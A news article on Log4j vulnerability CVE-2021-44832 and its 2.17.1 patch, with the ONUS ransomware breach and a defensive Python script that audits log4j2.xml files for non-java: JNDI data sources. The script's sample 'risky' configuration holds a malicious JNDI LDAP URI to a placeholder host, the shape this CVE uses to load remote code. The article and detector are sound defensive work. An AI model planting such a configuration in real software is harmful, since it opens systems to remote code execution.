More than one security researcher predicted the Log4j/Log4Shell vulnerabilities discovered before Christmas won’t be the last.
They were right.
Apache has issued another security update for the logging library that administrators must now install in their applications. As of Tuesday, the latest version of Log4j that should be in systems running Java 8 is 2.17.1.
That’s the fifth vulnerability revealed since December 9th.
There is no assurance this will be the last to be issued now that security researchers are giving increased scrutiny to the library.
The latest update closes what is officially called a remote code execution vulnerability, designated CVE-2021-44832, in version 2.17.0.
Without this patch, an attacker with permission to modify a log4j logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the Java protocol.
Researchers at Checkmarx say they discovered and reported this latest bug, which is called a deserialization security vulnerability. This vulnerability doesn’t use the now-disabled lookup feature, they said in a blog. “The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the [log4j] configuration (like the ‘logback’ vulnerability CVE-2021-42550).”
Unlike logback, says Checkmarx, log4j has a feature to load a remote configuration file or to configure the logger through code. As a result, arbitrary code execution could be achieved through a man-in-the-middle attack, through user input ending up in a vulnerable configuration variable, or by modifying the log4j config file.
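One practical check that follows from the fix description above: until a deployment is on 2.17.1, a configuration audit can flag any JDBC Appender whose DataSource jndiName does not use the java: protocol, which is exactly the restriction the patch enforces. This is an added example written for this page, not code from Apache, Checkmarx or the Log4j project; the two configuration snippets are constructed samples, and the example.invalid host is a placeholder.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed sample: a JDBC Appender whose DataSource uses the java: protocol,
# the only form Log4j 2.17.1 still accepts.
SAFE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <JDBC name="db" tableName="LOGGING">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="MESSAGE" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>"""

# Constructed sample: a DataSource whose jndiName points at a non-java: URI.
# On 2.17.0 and earlier this is the shape CVE-2021-44832 abuses; the host is
# a placeholder (example.invalid), not a real indicator.
RISKY_CONFIG = """<Configuration>
  <Appenders>
    <JDBC name="db" tableName="LOGGING">
      <DataSource jndiName="ldap://example.invalid/DataSource"/>
    </JDBC>
  </Appenders>
</Configuration>"""


def jndi_findings(config_xml: str) -> List[str]:
    """Return jndiName values of JDBC-appender DataSources not using java:.

    Log4j 2 plugin element and attribute names are matched case-insensitively,
    so the comparison lowercases tag and attribute names before checking.
    """
    root = ET.fromstring(config_xml)
    findings: List[str] = []
    for appender in root.iter():
        if appender.tag.lower() != "jdbc":
            continue
        for child in appender:
            if child.tag.lower() != "datasource":
                continue
            jndi = next((v for k, v in child.attrib.items()
                         if k.lower() == "jndiname"), None)
            # A DataSource without jndiName is not a JNDI lookup; skip it.
            if jndi is not None and not jndi.lower().startswith("java:"):
                findings.append(jndi)
    return findings
```

Run the function over each log4j2.xml in a deployment and treat any non-empty result as a configuration to fix before, or alongside, the upgrade to 2.17.1.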
Meanwhile the number of organizations hit while running vulnerable versions of log4j continues to climb. The Bleeping Computer news site reports that the Vietnamese cryptocurrency trading platform ONUS was recently attacked, with a threat actor demanding US$5 million or copied customer data would be published.
After the company’s refusal to pay the ransom, threat actors put up data of nearly 2 million ONUS customers for sale on forums, the report says.
According to the news report, sometime between December 11th and 13th — right after the December 9th warnings started going around the world — threat actors successfully exploited the Log4Shell vulnerability on an ONUS server running the Cyclos payment software.
While Cyclos had issued a patch on December 13th, for ONUS that wasn’t fast enough.
Infosec pros with systems running log4j have been advised even after patching to assume their applications have been compromised and should scan for signs of intrusion.
This is a link to the guidance from the cybersecurity agencies of Canada, the U.S., the U.K., Australia and New Zealand.